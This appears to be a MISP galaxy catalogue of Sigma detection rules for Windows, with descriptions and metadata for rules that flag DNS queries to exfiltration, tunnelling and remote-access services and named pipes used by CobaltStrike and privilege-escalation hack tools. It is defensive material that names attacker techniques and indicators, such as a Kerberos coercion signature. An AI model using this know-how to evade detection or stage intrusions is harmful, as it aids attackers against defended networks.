Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners. These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc. Such DNS activity can indicate potential delivery or command-and-control communication attempts.
Internal MISP references
UUID f8c1e80b-c73a-476a-ae24-6c72528b1521 which can be used as unique global reference for DNS Query To Common Malware Hosting and Shortener Services in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ahmed Nosir (@egycondor) |
| creation_date | 2025-06-02 |
| falsepositive | ['Legitimate use of these services is possible but rare in enterprise environments'] |
| filename | dns_query_win_common_malware_hosting_services.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1071.004'] |
DNS Query To AzureWebsites.NET By Non-Browser Process
Detects a DNS query by a non-browser process on the system to "azurewebsites.net". The latter has often been used by threat actors as a malware hosting and exfiltration site.
Internal MISP references
UUID e043f529-8514-4205-8ab0-7f7d2927b400 which can be used as unique global reference for DNS Query To AzureWebsites.NET By Non-Browser Process in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ - webarchive
- https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia - webarchive
- https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_domain_azurewebsites.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-06-24 |
| falsepositive | ['Likely with other browser software. Apply additional filters for any other browsers you might use.'] |
| filename | dns_query_win_domain_azurewebsites.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
AppX Package Installation Attempts Via AppInstaller.EXE
Detects DNS queries made by "AppInstaller.EXE". AppInstaller is the default handler for the "ms-appinstaller" URI; it attempts to load/install a package from the referenced URL.
Internal MISP references
UUID 7cff77e1-9663-46a3-8260-17f2e1aa9d0a which can be used as unique global reference for AppX Package Installation Attempts Via AppInstaller.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-24 |
| falsepositive | ['Unknown'] |
| filename | dns_query_win_appinstaller.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing
Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing. The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.
Internal MISP references
UUID e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c which can be used as unique global reference for Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing in MISP communities and other software using the MISP galaxy
External references
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html - webarchive
- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-06-20 |
| falsepositive | ['Unknown'] |
| filename | dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml |
| level | high |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.credential-access', 'attack.persistence', 'attack.privilege-escalation', 'attack.t1557.001', 'attack.t1187'] |
DNS Query Request By QuickAssist.EXE
Detects DNS queries initiated by "QuickAssist.exe" to the Microsoft Quick Assist primary endpoint, which is used to establish a session.
Internal MISP references
UUID 882e858a-3233-4ba8-855e-2f3d3575803d which can be used as unique global reference for DNS Query Request By QuickAssist.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/ - webarchive
- https://x.com/cyb3rops/status/1862406110365245506 - webarchive
- https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/ - webarchive
- https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_quickassist.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Muhammad Faisal (@faisalusuf) |
| creation_date | 2024-12-19 |
| falsepositive | ['Legitimate use of Quick Assist in the environment.'] |
| filename | dns_query_win_quickassist.yml |
| level | low |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.initial-access', 'attack.lateral-movement', 'attack.t1071.001', 'attack.t1210'] |
Suspicious DNS Query for IP Lookup Service APIs
Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non-browser process.
Internal MISP references
UUID ec82e2a5-81ea-4211-a1f8-37a0286df2c2 which can be used as unique global reference for Suspicious DNS Query for IP Lookup Service APIs in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html - webarchive
- https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon - webarchive
- https://twitter.com/neonprimetime/status/1436376497980428318 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Brandon George (blog post), Thomas Patzke |
| creation_date | 2021-07-08 |
| falsepositive | ['Legitimate usage of IP lookup services such as ipify API'] |
| filename | dns_query_win_susp_external_ip_lookup.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.reconnaissance', 'attack.t1590'] |
TeamViewer Domain Query By Non-TeamViewer Application
Detects DNS queries to a TeamViewer domain that is normally resolved only by a TeamViewer client, issued by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation).
Internal MISP references
UUID 778ba9a8-45e4-4b80-8e3e-34a419f0b85e which can be used as unique global reference for TeamViewer Domain Query By Non-TeamViewer Application in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-30 |
| falsepositive | ['Unknown binary names of TeamViewer', 'Depending on the environment the rule might require some initial tuning before usage to avoid FP with third party applications'] |
| filename | dns_query_win_teamviewer_domain_query_by_uncommon_app.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
DNS Server Discovery Via LDAP Query
Detects DNS server discovery via LDAP query requests from uncommon applications
Internal MISP references
UUID a21bcd7e-38ec-49ad-b69a-9ea17e69509e which can be used as unique global reference for DNS Server Discovery Via LDAP Query in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04 - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-20 |
| falsepositive | ['Likely'] |
| filename | dns_query_win_dns_server_discovery_via_ldap_query.yml |
| level | low |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1482'] |
DNS Query To Devtunnels Domain
Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Internal MISP references
UUID 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b which can be used as unique global reference for DNS Query To Devtunnels Domain in MISP communities and other software using the MISP galaxy
External references
- https://cydefops.com/devtunnels-unleashed - webarchive
- https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2 - webarchive
- https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | citron_ninja |
| creation_date | 2023-10-25 |
| falsepositive | ['Legitimate use of Devtunnels will also trigger this.'] |
| filename | dns_query_win_devtunnels_communication.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1071.001', 'attack.t1572'] |
DNS HybridConnectionManager Service Bus
Detects Azure Hybrid Connection Manager services querying the Azure service bus service
Internal MISP references
UUID 7bd3902d-8b8b-4dd4-838a-c6862d40150d which can be used as unique global reference for DNS HybridConnectionManager Service Bus in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2021-04-12 |
| falsepositive | ['Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service'] |
| filename | dns_query_win_hybridconnectionmgr_servicebus.yml |
| level | high |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1554'] |
DNS Query Tor .Onion Address - Sysmon
Detects DNS queries to an ".onion" address related to Tor routing networks
Internal MISP references
UUID b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 which can be used as unique global reference for DNS Query Tor .Onion Address - Sysmon in MISP communities and other software using the MISP galaxy
External references
- https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ - webarchive
- https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-20 |
| falsepositive | ['Unknown'] |
| filename | dns_query_win_tor_onion_domain_query.yml |
| level | high |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1090.003'] |
DNS Query To Ufile.io
Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
Internal MISP references
UUID 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b which can be used as unique global reference for DNS Query To Ufile.io in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | yatinwad, TheDFIRReport |
| creation_date | 2022-06-23 |
| falsepositive | ['DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take'] |
| filename | dns_query_win_ufile_io_query.yml |
| level | low |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.t1567.002'] |
DNS Query for Anonfiles.com Domain - Sysmon
Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes
Internal MISP references
UUID 065cceea-77ec-4030-9052-fc0affea7110 which can be used as unique global reference for DNS Query for Anonfiles.com Domain - Sysmon in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | pH-T (Nextron Systems) |
| creation_date | 2022-07-15 |
| falsepositive | ['Rare legitimate access to anonfiles.com'] |
| filename | dns_query_win_anonymfiles_com.yml |
| level | high |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.t1567.002'] |
DNS Query To MEGA Hosting Website
Detects DNS queries for subdomains related to the MEGA file-sharing website.
Internal MISP references
UUID 613c03ba-0779-4a53-8a1f-47f914a4ded3 which can be used as unique global reference for DNS Query To MEGA Hosting Website in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Aaron Greetham (@beardofbinary) - NCC Group |
| creation_date | 2021-05-26 |
| falsepositive | ['Legitimate DNS queries and usage of Mega'] |
| filename | dns_query_win_mega_nz.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.t1567.002'] |
DNS Query To Visual Studio Code Tunnels Domain
Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Internal MISP references
UUID b3e6418f-7c7a-4fad-993a-93b65027a9f1 which can be used as unique global reference for DNS Query To Visual Studio Code Tunnels Domain in MISP communities and other software using the MISP galaxy
External references
- https://cydefops.com/vscode-data-exfiltration - webarchive
- https://badoption.eu/blog/2023/01/31/code_c2.html - webarchive
- https://ipfyx.fr/post/visual-studio-code-tunnel/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | citron_ninja |
| creation_date | 2023-10-25 |
| falsepositive | ['Legitimate use of Visual Studio Code tunnel will also trigger this.'] |
| filename | dns_query_win_vscode_tunnel_communication.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1071.001'] |
DNS Query Request To OneLaunch Update Service
Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.
Internal MISP references
UUID df68f791-ad95-447f-a271-640a0dab9cf8 which can be used as unique global reference for DNS Query Request To OneLaunch Update Service in MISP communities and other software using the MISP galaxy
External references
- https://malware.guide/browser-hijacker/remove-onelaunch-virus/ - webarchive
- https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf - webarchive
- https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Josh Nickels |
| creation_date | 2024-02-26 |
| falsepositive | ['Unlikely'] |
| filename | dns_query_win_onelaunch_update_service.yml |
| level | low |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.collection', 'attack.t1056'] |
DNS Query Request By Regsvr32.EXE
Detects DNS queries initiated by "Regsvr32.exe"
Internal MISP references
UUID 36e037c4-c228-4866-b6a3-48eb292b9955 which can be used as unique global reference for DNS Query Request By Regsvr32.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Dmitriy Lifanov, oscd.community |
| creation_date | 2019-10-25 |
| falsepositive | ['Unknown'] |
| filename | dns_query_win_regsvr32_dns_query.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1559.001', 'attack.defense-evasion', 'attack.t1218.010'] |
DNS Query To Remote Access Software Domain From Non-Browser App
An adversary may use legitimate desktop support and remote access software, such as TeamViewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and TeamViewer are used frequently by adversaries when compared with other legitimate software. (Citation: Symantec Living off the Land)
Internal MISP references
UUID 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 which can be used as unique global reference for DNS Query To Remote Access Software Domain From Non-Browser App in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows - webarchive
- https://redcanary.com/blog/misbehaving-rats/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows - webarchive
- https://blog.sekoia.io/scattered-spider-laying-new-eggs/ - webarchive
- https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093 - webarchive
- https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Connor Martin |
| creation_date | 2022-07-11 |
| falsepositive | ['Likely with other browser software. Apply additional filters for any other browsers you might use.'] |
| filename | dns_query_win_remote_access_software_domains_non_browsers.yml |
| level | medium |
| logsource.category | dns_query |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
Internal MISP references
UUID fe3ac066-98bb-432a-b1e7-a5229cb39d4a which can be used as unique global reference for Malicious Named Pipe Created in MISP communities and other software using the MISP galaxy
External references
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf - webarchive
- https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/ - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-117A - webarchive
- https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ - webarchive
- https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a - webarchive
- https://thedfirreport.com/2020/06/21/snatch-ransomware/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - webarchive
- https://github.com/RiccardoAncarani/LiquidSnake - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity - webarchive
- https://securelist.com/faq-the-projectsauron-apt/75533/ - webarchive
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), blueteam0ps, elhoim |
| creation_date | 2017-11-06 |
| falsepositive | ['Unknown'] |
| filename | pipe_created_susp_malicious_namedpipes.yml |
| level | critical |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055'] |
CobaltStrike Named Pipe Patterns
Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
Internal MISP references
UUID 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 which can be used as unique global reference for CobaltStrike Named Pipe Patterns in MISP communities and other software using the MISP galaxy
External references
- https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - webarchive
- https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) |
| creation_date | 2021-07-30 |
| falsepositive | ['Chrome instances using the exact same pipe name "mojo.xxx"', 'Websense Endpoint using the pipe name "DserNamePipe(R |
| filename | pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml |
| level | high |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055', 'stp.1k'] |
PUA - RemCom Default Named Pipe
Detects creation of the default RemCom named pipe.
Internal MISP references
UUID d36f87ea-c403-44d2-aa79-1a0ac7c24456 which can be used as unique global reference for PUA - RemCom Default Named Pipe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-07 |
| falsepositive | ['Legitimate Administrator activity'] |
| filename | pipe_created_pua_remcom_default_pipe.yml |
| level | medium |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002'] |
ADFS Database Named Pipe Connection By Uncommon Tool
Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Such connections can be used to access the AD FS configuration settings, which contain sensitive information used to sign SAML tokens.
Internal MISP references
UUID 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 which can be used as unique global reference for ADFS Database Named Pipe Connection By Uncommon Tool in MISP communities and other software using the MISP galaxy
External references
- https://github.com/Azure/SimuLand - webarchive
- https://o365blog.com/post/adfs/ - webarchive
- https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez @Cyb3rWard0g |
| creation_date | 2021-10-08 |
| falsepositive | ['Unknown'] |
| filename | pipe_created_adfs_namedpipe_connection_uncommon_tool.yml |
| level | medium |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1005'] |
CobaltStrike Named Pipe Pattern Regex
Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
Internal MISP references
UUID 0e7163d4-9e19-4fa7-9be6-000c61aad77a which can be used as unique global reference for CobaltStrike Named Pipe Pattern Regex in MISP communities and other software using the MISP galaxy
External references
- https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - webarchive
- https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-07-30 |
| falsepositive | ['Unknown'] |
| filename | pipe_created_hktl_cobaltstrike_re.yml |
| level | critical |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055'] |
PUA - PAExec Default Named Pipe
Detects creation of the PAExec default named pipe.
Internal MISP references
UUID f6451de4-df0a-41fa-8d72-b39f54a08db5 which can be used as unique global reference for PUA - PAExec Default Named Pipe in MISP communities and other software using the MISP galaxy
External references
- https://github.com/poweradminllc/PAExec - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-26 |
| falsepositive | ['Unknown'] |
| filename | pipe_created_pua_paexec_default_pipe.yml |
| level | medium |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002'] |
PUA - CSExec Default Named Pipe
Detects creation of the default CSExec named pipe.
Internal MISP references
UUID f318b911-ea88-43f4-9281-0de23ede628e which can be used as unique global reference for PUA - CSExec Default Named Pipe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-07 |
| falsepositive | ['Legitimate Administrator activity'] |
| filename | pipe_created_pua_csexec_default_pipe.yml |
| level | medium |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002'] |
HackTool - CoercedPotato Named Pipe Creation
Detects the pattern of a pipe name as used by the hack tool CoercedPotato
Internal MISP references
UUID 4d0083b3-580b-40da-9bba-626c19fe4033 which can be used as unique global reference for HackTool - CoercedPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2023-10-11 |
| falsepositive | ['Unknown'] |
| filename | pipe_created_hktl_coercedpotato.yml |
| level | high |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055'] |
HackTool - EfsPotato Named Pipe Creation
Detects the pattern of a pipe name as used by the hack tool EfsPotato
Internal MISP references
UUID 637f689e-b4a5-4a86-be0e-0100a0a33ba2 which can be used as unique global reference for HackTool - EfsPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['\pipe\LOCAL\Monitorian'] |
| filename | pipe_created_hktl_efspotato.yml |
| level | high |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055'] |
HackTool - DiagTrackEoP Default Named Pipe
Detects creation of the default named pipe used by the DiagTrackEoP POC, a tool that abuses the "SeImpersonate" privilege.
Internal MISP references
UUID 1f7025a6-e747-4130-aac4-961eb47015f1 which can be used as unique global reference for HackTool - DiagTrackEoP Default Named Pipe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-03 |
| falsepositive | ['Unlikely'] |
| filename | pipe_created_hktl_diagtrack_eop.yml |
| level | critical |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.privilege-escalation'] |
HackTool - Koh Default Named Pipe
Detects creation of the default named pipes used by the Koh tool.
Internal MISP references
UUID 0adc67e0-a68f-4ffd-9c43-28905aad5d6a which can be used as unique global reference for HackTool - Koh Default Named Pipe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-08 |
| falsepositive | ['Unlikely'] |
| filename | pipe_created_hktl_koh_default_pipe.yml |
| level | critical |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.credential-access', 'attack.t1528', 'attack.t1134.001'] |
CobaltStrike Named Pipe
Detects the creation of a named pipe as used by CobaltStrike
Internal MISP references
UUID d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 which can be used as unique global reference for CobaltStrike Named Pipe in MISP communities and other software using the MISP galaxy
External references
- https://redcanary.com/threat-detection-report/threats/cobalt-strike/ - webarchive
- https://twitter.com/d4rksystem/status/1357010969264873472 - webarchive
- https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/ - webarchive
- https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/ - webarchive
- https://github.com/SigmaHQ/sigma/issues/253 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Wojciech Lesicki |
| creation_date | 2021-05-25 |
| falsepositive | ['Unknown'] |
| filename | pipe_created_hktl_cobaltstrike.yml |
| level | critical |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055'] |
Alternate PowerShell Hosts Pipe
Detects alternate PowerShell hosts, which can potentially bypass detections that look only for powershell.exe.
Internal MISP references
UUID 58cb02d5-78ce-4692-b3e1-dce850aae41a which can be used as unique global reference for Alternate PowerShell Hosts Pipe in MISP communities and other software using the MISP galaxy
External references
- https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html - webarchive
- https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez @Cyb3rWard0g, Tim Shelton |
| creation_date | 2019-09-12 |
| falsepositive | ['Programs using PowerShell directly without invocation of a dedicated interpreter.'] |
